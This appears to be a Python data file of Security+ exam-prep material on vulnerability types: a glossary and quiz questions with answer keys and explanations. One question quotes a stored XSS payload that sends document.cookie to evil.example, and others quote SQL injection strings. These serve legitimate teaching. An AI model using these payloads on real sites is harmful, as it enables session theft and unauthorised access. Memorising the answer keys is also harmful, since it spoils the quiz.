TOPIC = {
    "id": "2.3",
    "domain": 2,
    "title": "Explain various types of vulnerabilities.",
    "short": "Types of Vulnerabilities",
}

TERMS = [
    ("Memory injection", "Attacker inserts malicious code into the memory space of a running process (e.g., DLL injection) so it executes with that process's privileges"),
    ("Buffer overflow", "Writing more data to a memory buffer than it can hold, overwriting adjacent memory; can crash the app or allow arbitrary code execution"),
    ("Race condition", "Flaw where system behavior depends on the timing/sequence of events; an attacker wins the timing window to cause unintended results"),
    ("Time-of-check to time-of-use (TOC/TOU)", "Race condition where a resource is changed between the moment it is validated (check) and the moment it is used"),
    ("Malicious update", "A software update that has been tampered with or trojanized so that installing it delivers malware through a trusted channel"),
    ("OS-based vulnerability", "Flaw in the operating system itself (kernel, services, built-in components); mitigated primarily through patch management and hardening"),
    ("SQL injection (SQLi)", "Inserting SQL syntax into application input so the database executes attacker-supplied commands; classic test string: ' OR 1=1 --"),
    ("Cross-site scripting (XSS)", "Injecting malicious script into a trusted website so it runs in other users' browsers; can steal cookies/sessions"),
    ("Firmware vulnerability", "Flaw in low-level code embedded in hardware (BIOS/UEFI, device controllers); exploits can persist below the OS and survive reinstallation"),
    ("End-of-life (EOL)", "Vendor has stopped selling and supporting a product — no more security patches, so every new flaw stays exploitable"),
    ("Legacy system", "Outdated hardware/software still in production, often because a critical business process depends on it; frequently unpatchable"),
    ("VM escape", "Attacker breaks out of a guest virtual machine to attack the hypervisor or other VMs on the same host"),
    ("Resource reuse", "Memory or storage reallocated to a new VM/tenant without being wiped, exposing remnants of the previous tenant's data"),
    ("Cloud-specific vulnerability", "Weakness tied to cloud environments, such as insecure APIs, weak tenant isolation, or misunderstanding the shared responsibility model"),
    ("Supply chain vulnerability", "Weakness introduced through third parties that supply hardware, software, or services rather than through your own systems"),
    ("Service provider risk", "Compromise of an MSP, cloud, or other outsourced provider that gives attackers a path into all of that provider's customers"),
    ("Hardware provider risk", "Counterfeit or tampered equipment/components entering the environment through the hardware supply chain"),
    ("Software provider risk", "Compromised or trojanized commercial software, libraries, or dependencies distributed by a software vendor"),
    ("Cryptographic vulnerability", "Weakness from broken/deprecated algorithms (e.g., DES, MD5), short keys, flawed implementations, or poor key management"),
    ("Misconfiguration", "Insecure settings such as default credentials, open ports/services, excessive permissions, or unsecured cloud storage"),
    ("Sideloading", "Installing mobile apps from outside the official app store, bypassing the store's vetting and increasing malware risk"),
    ("Jailbreaking", "Removing manufacturer software restrictions on a mobile device (iOS term) to gain root-level control, disabling built-in protections"),
    ("Rooting", "Gaining privileged (root) access on an Android device, the Android counterpart to jailbreaking; both undermine the device security model"),
    ("Zero-day vulnerability", "Flaw unknown to the vendor that attackers exploit before any patch exists; signature-based defenses cannot detect it"),
]

QUESTIONS = [
    # --- multiple choice ---
    {
        "type": "mc",
        "q": "A penetration tester sends a 500-character string into an input field that the application stores in a 64-byte variable. The application crashes, and the tester finds the return address on the stack was overwritten. Which vulnerability is this?",
        "choices": ["Buffer overflow", "SQL injection", "Race condition", "Memory leak"],
        "answer": 0,
        "explain": "Writing more data than a buffer can hold overwrites adjacent memory — including the return address — which is the classic buffer overflow. A skilled attacker can replace that address with a pointer to malicious code and achieve code execution. SQLi targets database queries, and a race condition is a timing flaw, not a memory-size flaw.",
    },
    {
        "type": "mc",
        "q": "Malware on a workstation inserts a malicious DLL into the address space of a running, trusted process so its code executes with that process's privileges and evades detection. Which application vulnerability is being exploited?",
        "choices": ["Buffer overflow", "Memory injection", "Malicious update", "Resource reuse"],
        "answer": 1,
        "explain": "Memory injection (such as DLL injection) places attacker code directly into a running process's memory, inheriting its privileges and hiding inside a legitimate process. A buffer overflow overruns a buffer's boundary; this attack instead writes into process memory through injection techniques. Resource reuse is a virtualization/cloud data-remnant issue.",
    },
    {
        "type": "mc",
        "q": "A program verifies that a user has permission to access a file, but before the file is actually opened, an attacker swaps it for a symbolic link to /etc/shadow. The program then opens the sensitive file with elevated rights. What is this an example of?",
        "choices": ["Memory injection", "Jailbreaking", "Time-of-check to time-of-use (TOC/TOU) race condition", "SQL injection"],
        "answer": 2,
        "explain": "The resource changed between the time it was checked (permission validation) and the time it was used (file open) — the definition of a TOC/TOU race condition. The attacker wins the timing window between the two operations. The other options do not involve exploiting a timing gap.",
    },
    {
        "type": "mc",
        "q": "Attackers compromise a software vendor's build system and insert a backdoor into a digitally signed product update, which thousands of customers then install through the normal update process. Which vulnerability type does this BEST describe?",
        "choices": ["Zero-day", "Misconfiguration", "Firmware vulnerability", "Malicious update"],
        "answer": 3,
        "explain": "A malicious update abuses the trusted update channel itself — because the update is signed and delivered normally, customers install malware willingly. This mirrors the SolarWinds-style attack and is also a software supply chain compromise. It is not a zero-day, because no unknown flaw in the product is being exploited; the delivery mechanism is the weapon.",
    },
    {
        "type": "mc",
        "q": "A server running an unpatched operating system is compromised through a known kernel flaw that allows a local user to escalate to administrator. Which category of vulnerability was exploited, and what is the PRIMARY mitigation?",
        "choices": [
            "OS-based vulnerability; patch management",
            "Web-based vulnerability; input validation",
            "Cryptographic vulnerability; longer keys",
            "Hardware vulnerability; firmware updates",
        ],
        "answer": 0,
        "explain": "A flaw in the kernel is an operating system (OS)-based vulnerability, and the primary defense is a disciplined patch-management program plus system hardening. Input validation addresses web/application flaws like SQLi and XSS, and key length addresses cryptographic weaknesses — neither fixes a kernel bug.",
    },
    {
        "type": "mc",
        "q": "Reviewing web server logs, an analyst sees a login attempt with the username field set to: admin' OR '1'='1' -- . What attack is being attempted?",
        "choices": ["Cross-site scripting", "SQL injection", "Buffer overflow", "VM escape"],
        "answer": 1,
        "explain": "The quote, OR '1'='1' always-true condition, and comment marker (--) are classic SQL injection syntax designed to alter the database query and bypass authentication. XSS would inject script tags for browsers to execute, not SQL keywords, and buffer overflow is about oversized input into fixed memory, not query manipulation.",
    },
    {
        "type": "mc",
        "q": "An attacker posts a comment containing <script>document.location='http://evil.example/?c='+document.cookie</script> on a forum. Every user who later views the comment has their session cookie sent to the attacker. Which vulnerability does the forum have?",
        "choices": ["SQL injection", "Race condition", "Cross-site scripting (XSS)", "Misconfiguration"],
        "answer": 2,
        "explain": "The site stored attacker-supplied script and served it to other users, whose browsers executed it — stored (persistent) cross-site scripting. XSS runs in victims' browsers and commonly steals cookies and sessions. SQL injection targets the back-end database, not other users' browsers.",
    },
    {
        "type": "mc",
        "q": "Which coding practice is the MOST effective defense against SQL injection?",
        "choices": [
            "Encrypting the database at rest",
            "Increasing the database account's privileges",
            "Disabling browser scripting",
            "Using parameterized queries with input validation",
        ],
        "answer": 3,
        "explain": "Parameterized queries (prepared statements) keep user input as data rather than executable SQL, and input validation rejects malicious syntax — together the standard SQLi defense. Encryption at rest protects stored data from theft but not from injected queries, and disabling browser scripting addresses XSS, not SQLi.",
    },
    {
        "type": "mc",
        "q": "A rootkit infects the UEFI code on a laptop's motherboard. The security team wipes the drive and reinstalls the operating system, but the malware returns. Which type of vulnerability was exploited?",
        "choices": ["Firmware vulnerability", "OS-based vulnerability", "Cloud-specific vulnerability", "Cross-site scripting"],
        "answer": 0,
        "explain": "Firmware such as BIOS/UEFI runs below the operating system, so malware implanted there survives disk wipes and OS reinstalls. Mitigations include vendor firmware updates, Secure Boot, and measured boot. An OS-based flaw would have been removed by the reinstall.",
    },
    {
        "type": "mc",
        "q": "A hospital still runs a medical records application on an operating system whose vendor stopped releasing security patches two years ago. Which term describes why this system's risk keeps growing over time?",
        "choices": ["Zero-day", "End-of-life", "Race condition", "Resource reuse"],
        "answer": 1,
        "explain": "An end-of-life (EOL) product no longer receives vendor security patches, so every newly discovered flaw remains permanently exploitable and risk compounds over time. A zero-day is a flaw unknown to the vendor, which is different — here the flaws may be well known, but no fix will ever ship. Compensating controls like network segmentation are typically required.",
    },
    {
        "type": "mc",
        "q": "A manufacturing plant depends on a 20-year-old control system that cannot be patched or upgraded without breaking a critical production process. The security team isolates it on its own network segment. What kind of system is this, and what is the isolation an example of?",
        "choices": [
            "Zero-day system; incident response",
            "Jailbroken system; containment",
            "Virtualized system; VM escape prevention",
            "Legacy system; compensating control",
        ],
        "answer": 3,
        "explain": "Outdated technology kept in production because the business depends on it is a legacy system. When patching is impossible, compensating controls such as network segmentation and strict access control reduce the exploitable exposure. Legacy overlaps with EOL, but 'legacy' emphasizes the outdated-but-still-required nature of the system.",
    },
    {
        "type": "mc",
        "q": "An attacker who has compromised one guest virtual machine exploits a hypervisor flaw to execute code on the host and access other tenants' virtual machines. What is this attack called?",
        "choices": ["Resource reuse", "VM escape", "Sideloading", "Memory injection"],
        "answer": 1,
        "explain": "Breaking out of the guest VM's isolation to reach the hypervisor or neighboring VMs is a VM escape — the most serious virtualization attack because the hypervisor controls every guest. Resource reuse is a passive data-remnant exposure, not a breakout. Keeping hypervisors patched is the key mitigation.",
    },
    {
        "type": "mc",
        "q": "A cloud customer spins up a new virtual machine and, while examining its allocated memory, finds readable data fragments belonging to another tenant that previously used the same physical resources. Which virtualization vulnerability is this?",
        "choices": ["Resource reuse", "VM escape", "TOC/TOU", "Malicious update"],
        "answer": 0,
        "explain": "When memory or storage is reallocated to a new tenant without being sanitized, remnants of the previous tenant's data can be exposed — the resource reuse vulnerability. Unlike VM escape, no isolation boundary is actively broken; the provider simply failed to wipe reused resources. Providers mitigate this by zeroing memory and storage before reallocation.",
    },
    {
        "type": "mc",
        "q": "A company adopts IaaS, assuming the cloud provider handles all security. Attackers later abuse a poorly secured management API to access company workloads. Which factors BEST describe this cloud-specific exposure?",
        "choices": [
            "VM escape and firmware tampering",
            "Jailbreaking and sideloading",
            "Insecure APIs and misunderstanding the shared responsibility model",
            "Buffer overflow and race conditions",
        ],
        "answer": 2,
        "explain": "Cloud-specific vulnerabilities include insecure management APIs, weak tenant isolation, and customers assuming the provider secures things that are actually the customer's responsibility under the shared responsibility model. In IaaS, the customer still secures the OS, applications, data, and access. The other pairs are virtualization, mobile, and application vulnerability categories.",
    },
    {
        "type": "mc",
        "q": "Attackers compromise a managed service provider (MSP) and use its remote administration tools to push ransomware to dozens of the MSP's customers at once. Which supply chain element was the attack vector?",
        "choices": ["Hardware provider", "Service provider", "Software provider", "Cloud tenant"],
        "answer": 1,
        "explain": "The MSP is a service provider — a third party with trusted, often privileged access into customer environments, making it a high-value supply chain target. One provider compromise fans out to every customer. Hardware and software provider risks involve tampered equipment or trojanized code, not abused outsourced service access.",
    },
    {
        "type": "mc",
        "q": "A procurement audit discovers that a batch of network switches bought from an unauthorized reseller are counterfeit and contain modified components. Which vulnerability category does this represent?",
        "choices": ["Hardware provider supply chain risk", "Misconfiguration", "OS-based vulnerability", "Cryptographic vulnerability"],
        "answer": 0,
        "explain": "Counterfeit or tampered equipment entering the environment through procurement is a hardware provider supply chain risk. Such devices may contain backdoors or fail unpredictably, and the compromise happens before the gear ever reaches you. Buying only from authorized, vetted vendors is the primary mitigation.",
    },
    {
        "type": "mc",
        "q": "A development team builds its product on a popular open-source library. Attackers publish a trojanized version of that library, and the team's automated build pulls it in, embedding malware in the shipped product. Which risk does this illustrate?",
        "choices": ["Service provider risk", "Hardware provider risk", "Cryptographic vulnerability", "Software provider (software supply chain) risk"],
        "answer": 3,
        "explain": "Compromised third-party code — libraries, dependencies, or commercial software — is software provider supply chain risk. The malicious code rides trusted distribution into every downstream product. Mitigations include dependency vetting, verifying signatures/hashes, and maintaining a software bill of materials (SBOM).",
    },
    {
        "type": "mc",
        "q": "A security assessment finds an internal application still hashing passwords with MD5 and encrypting archived files with DES. Which type of vulnerability does this represent?",
        "choices": ["Misconfiguration", "Cryptographic vulnerability", "Zero-day", "Race condition"],
        "answer": 1,
        "explain": "MD5 and DES are broken/deprecated algorithms — MD5 has practical collision attacks and DES's 56-bit key can be brute-forced — so relying on them is a cryptographic vulnerability. The category also covers short keys, flawed implementations, and poor key management. Misconfiguration is about insecure settings, not weak algorithm choices baked into the design.",
    },
    {
        "type": "mc",
        "q": "A vulnerability scan of a new server reveals the administrator account still uses the vendor's default password, unnecessary services are listening on open ports, and a cloud storage bucket holding backups is publicly readable. Which vulnerability type do all of these findings share?",
        "choices": ["Misconfiguration", "End-of-life", "Memory injection", "VM escape"],
        "answer": 0,
        "explain": "Default credentials, unneeded open services, and publicly exposed storage are all misconfigurations — insecure settings rather than flaws in the code itself. Hardening with secure baselines, changing defaults, and configuration audits are the mitigations. Nothing here involves unsupported products or code-level exploits.",
    },
    {
        "type": "mc",
        "q": "An Android user downloads a game as an APK file from a third-party website instead of the official app store and installs it manually. The app turns out to contain spyware. Which mobile device vulnerability enabled this?",
        "choices": ["Jailbreaking", "Zero-day", "Sideloading", "Firmware vulnerability"],
        "answer": 2,
        "explain": "Installing apps from outside the official store is sideloading — it bypasses the store's vetting and malware screening, so untrusted code reaches the device. Jailbreaking is different: it removes the OS's built-in restrictions entirely. MDM policies commonly block sideloading on corporate devices.",
    },
    {
        "type": "mc",
        "q": "An employee removes the manufacturer's software restrictions on a corporate iPhone to install unapproved tweaks, disabling many of the platform's built-in protections. What has the employee done?",
        "choices": ["Sideloaded the device", "Jailbroken the device", "Escaped the VM", "Exploited a race condition"],
        "answer": 1,
        "explain": "Removing iOS's manufacturer restrictions to gain root-level control is jailbreaking (rooting is the Android equivalent). It disables the sandboxing and code-signing protections the security model depends on, so MDM solutions typically detect and quarantine jailbroken devices. Sideloading is just installing apps from outside the official store.",
    },
    {
        "type": "mc",
        "q": "Attackers are actively exploiting a flaw in a popular browser, but the vendor has not yet been able to release a patch because the flaw was unknown until the attacks began. What is this type of vulnerability called?",
        "choices": ["Legacy vulnerability", "Misconfiguration", "End-of-life vulnerability", "Zero-day vulnerability"],
        "answer": 3,
        "explain": "A zero-day is a vulnerability exploited before the vendor knows about it or has released a fix — defenders have had 'zero days' to prepare. Signature-based tools cannot detect it, so defense relies on layered controls, behavior-based detection, and rapid patching once a fix ships. EOL is different: the product is simply no longer supported at all.",
    },
    {
        "type": "mc",
        "q": "Which statement BEST distinguishes SQL injection from cross-site scripting?",
        "choices": [
            "SQLi targets the back-end database; XSS executes script in other users' browsers",
            "SQLi requires physical access; XSS requires stolen credentials",
            "SQLi only affects Windows servers; XSS only affects Linux servers",
            "SQLi attacks the hypervisor; XSS attacks firmware",
        ],
        "answer": 0,
        "explain": "Both are web-based injection flaws caused by trusting user input, but the victims differ: SQLi manipulates queries executed by the server's database, while XSS delivers script that runs in the browsers of other users who view the page. Neither requires physical access, and neither is tied to a particular OS, hypervisor, or firmware.",
    },
    # --- true/false ---
    {
        "type": "tf",
        "q": "True or False: By definition, a vendor patch is already available for a zero-day vulnerability at the time it is first exploited.",
        "answer": False,
        "explain": "A zero-day is exploited before the vendor is aware of the flaw or has produced a fix — that is exactly what makes it a zero-day. Once a patch is released and applied, the window closes and it is no longer a zero-day threat to patched systems.",
    },
    {
        "type": "tf",
        "q": "True or False: Jailbreaking a mobile device improves its security posture by giving the user full control over the operating system.",
        "answer": False,
        "explain": "Jailbreaking removes the manufacturer's built-in protections — sandboxing, code signing, and restriction of privileged access — which weakens the device's security model. It also enables installation of unvetted software. That is why MDM platforms detect and block jailbroken/rooted devices.",
    },
    {
        "type": "tf",
        "q": "True or False: In a cloud environment, memory or storage reassigned to a new tenant without sanitization can expose the previous tenant's data; this is called resource reuse.",
        "answer": True,
        "explain": "Resource reuse is a virtualization/cloud vulnerability where deallocated memory or storage still contains remnant data when handed to the next tenant. Providers mitigate it by wiping (zeroing) resources before reallocation. No isolation break-out occurs, which distinguishes it from VM escape.",
    },
    {
        "type": "tf",
        "q": "True or False: A time-of-check to time-of-use (TOC/TOU) flaw is a type of race condition.",
        "answer": True,
        "explain": "TOC/TOU is the classic race condition: a resource is validated at one moment and used at a later moment, and an attacker changes it in between. The exploit depends entirely on winning that timing window, which is what defines a race condition.",
    },
    {
        "type": "tf",
        "q": "True or False: Hardware that has reached end-of-life continues to receive security patches from the vendor as long as it remains in use.",
        "answer": False,
        "explain": "End-of-life means the vendor has stopped supporting the product — no more security patches, regardless of how many customers still run it. Newly discovered vulnerabilities therefore remain exploitable forever, and organizations must replace the product or apply compensating controls such as isolation.",
    },
    {
        "type": "tf",
        "q": "True or False: A successful buffer overflow can allow an attacker to execute arbitrary code with the privileges of the vulnerable application.",
        "answer": True,
        "explain": "By overflowing a buffer, an attacker can overwrite control data such as the return address and redirect execution to attacker-supplied code, which then runs with the compromised process's privileges. Defenses include input length validation, ASLR, and DEP/no-execute memory protections.",
    },
    # --- fill in ---
    {
        "type": "fill",
        "q": "An attacker enters ' OR 1=1 -- into a web form to manipulate the database query behind it. This attack is called ______. (type your answer)",
        "answers": ["sql injection", "sqli", "sql injection (sqli)", "structured query language injection"],
        "explain": "SQL injection inserts SQL syntax into user input so the database executes attacker-controlled commands — bypassing logins, dumping tables, or modifying data. Parameterized queries and input validation are the primary defenses.",
    },
    {
        "type": "fill",
        "q": "An attack that breaks out of a guest virtual machine to compromise the hypervisor or other guests is called VM ______. (type your answer)",
        "answers": ["escape", "vm escape"],
        "explain": "VM escape defeats the isolation boundary between a guest and its hypervisor. Because the hypervisor controls all guests on the host, a successful escape can compromise every tenant, making hypervisor patching critical.",
    },
    {
        "type": "fill",
        "q": "A vulnerability that attackers exploit before the vendor knows it exists or has released a patch is called a ______ vulnerability. (type your answer)",
        "answers": ["zero-day", "zero day", "0-day", "0day"],
        "explain": "Zero-day refers to defenders having had zero days to prepare — no signature, no patch. Layered defenses and anomaly/behavior-based detection are the realistic protections until a fix is released.",
    },
    {
        "type": "fill",
        "q": "Installing a mobile app package obtained outside the official app store, bypassing the store's security vetting, is known as ______. (type your answer)",
        "answers": ["sideloading", "side loading", "side-loading"],
        "explain": "Sideloading skips the app store's malware screening and review process, so malicious apps reach the device unvetted. Corporate MDM policies typically prohibit or technically block sideloading on managed devices.",
    },
    {
        "type": "fill",
        "q": "The low-level software embedded in hardware such as the BIOS/UEFI, where malware can persist even after the operating system is reinstalled, is called ______. (type your answer)",
        "answers": ["firmware"],
        "explain": "Firmware runs beneath the operating system, so compromising it gives attackers persistence that survives disk wipes and OS reinstalls. Mitigations include applying vendor firmware updates and enabling Secure Boot to verify boot integrity.",
    },
    {
        "type": "fill",
        "q": "A flaw whose exploitation depends on the attacker winning a timing window between events — such as between a security check and the resource's use — is called a ______ condition. (type your answer)",
        "answers": ["race", "race condition"],
        "explain": "A race condition exists when the outcome depends on event timing that an attacker can influence. The TOC/TOU variant swaps or alters a resource after it is checked but before it is used, turning a passed security check into a lie.",
    },
    # --- matching ---
    {
        "type": "match",
        "q": "Match each vulnerability to its SY0-701 category.",
        "pairs": [
            ["Buffer overflow", "Application"],
            ["Cross-site scripting (XSS)", "Web-based"],
            ["VM escape", "Virtualization"],
            ["Sideloading", "Mobile device"],
            ["Use of deprecated algorithms like DES", "Cryptographic"],
        ],
        "explain": "The objective groups vulnerabilities by where they live: buffer overflows (with memory injection and race conditions) are application flaws; SQLi and XSS are web-based; VM escape and resource reuse are virtualization; sideloading and jailbreaking are mobile; weak/deprecated algorithms are cryptographic.",
    },
    {
        "type": "match",
        "q": "Match each scenario to the vulnerability type it describes.",
        "pairs": [
            ["Vendor stopped issuing patches for a product still in use", "End-of-life"],
            ["Outdated system kept running because a critical process depends on it", "Legacy"],
            ["Server deployed with default credentials and unnecessary open ports", "Misconfiguration"],
            ["Signed vendor patch secretly modified to install a backdoor", "Malicious update"],
            ["Compromised MSP used as a pivot into its customers' networks", "Supply chain (service provider)"],
        ],
        "explain": "EOL means support has ended; legacy emphasizes outdated-but-still-needed technology; misconfiguration is insecure settings rather than flawed code; a malicious update weaponizes the trusted patch channel; and a compromised service provider is the supply chain path that fans out to many victims at once.",
    },
    {
        "type": "match",
        "q": "Match each attack technique to the term that names it.",
        "pairs": [
            ["Injecting a malicious DLL into a running process", "Memory injection"],
            ["Swapping a file between its security check and its use", "TOC/TOU race condition"],
            ["Script stored on a site executes in other visitors' browsers", "Stored XSS"],
            ["Reading another tenant's data from unsanitized reallocated memory", "Resource reuse"],
            ["Removing iOS restrictions to gain root-level device control", "Jailbreaking"],
        ],
        "explain": "Memory injection plants code inside a trusted process; TOC/TOU exploits the gap between validation and use; stored XSS persists attacker script on the server for every visitor; resource reuse exposes remnant data in recycled cloud resources; and jailbreaking strips the mobile OS's built-in protections.",
    },
]
